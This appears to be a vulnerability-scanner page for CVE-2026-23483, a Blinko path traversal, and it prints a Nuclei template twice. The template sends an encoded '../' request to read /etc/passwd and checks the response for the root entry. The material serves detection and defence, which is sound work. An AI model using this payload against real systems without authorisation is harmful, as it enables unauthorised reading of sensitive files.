Blinko <= 1.8.3 - Path Traversal via /plugins

CVE-2026-23483

Verified

Description

Blinko <= 1.8.3 contains a path traversal caused by improper path concatenation without verification in the plugin file server endpoint, letting remote attackers access arbitrary files, exploit requires network access.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

blinko

Published Date

April 27, 2026

Template Author

tx1ee

CVE-2026-23483.yaml

id: CVE-2026-23483

info:
  name: Blinko <= 1.8.3 - Path Traversal via /plugins
  author: tx1ee
  severity: medium
  description: |
    Blinko <= 1.8.3 contains a path traversal caused by improper path concatenation without verification in the plugin file server endpoint, letting remote attackers access arbitrary files, exploit requires network access.
  impact: |
    Remote attackers can access arbitrary files outside the intended directory, potentially exposing sensitive data.
  remediation: |
    Update to the latest version once available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23483
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-23483
    epss-score: 0.02393
    epss-percentile: 0.85214
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a8e495cf60ea65afc5e9b4f2db48819e4cc0c49a23421e62503579196a1bff1102206d300bb7ccc32b1f9e0f455273715da70ddc26ad7a21d307302f82b1a4dbff95:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2026-23483

CWE ID:

cwe-22

References

https://nvd.nist.gov/vuln/detail/CVE-2026-23483 https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v

Remediation Steps

Update to the latest version once available.

id: CVE-2026-23483

info:
  name: Blinko <= 1.8.3 - Path Traversal via /plugins
  author: tx1ee
  severity: medium
  description: |
    Blinko <= 1.8.3 contains a path traversal caused by improper path concatenation without verification in the plugin file server endpoint, letting remote attackers access arbitrary files, exploit requires network access.
  impact: |
    Remote attackers can access arbitrary files outside the intended directory, potentially exposing sensitive data.
  remediation: |
    Update to the latest version once available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23483
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-23483
    epss-score: 0.02393
    epss-percentile: 0.85214
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a8e495cf60ea65afc5e9b4f2db48819e4cc0c49a23421e62503579196a1bff1102206d300bb7ccc32b1f9e0f455273715da70ddc26ad7a21d307302f82b1a4dbff95:922c64590222798bb761d5b6d8e72950

Blinko <= 1.8.3 - Path Traversal via /plugins

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Blinko <= 1.8.3 - Path Traversal via /plugins

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps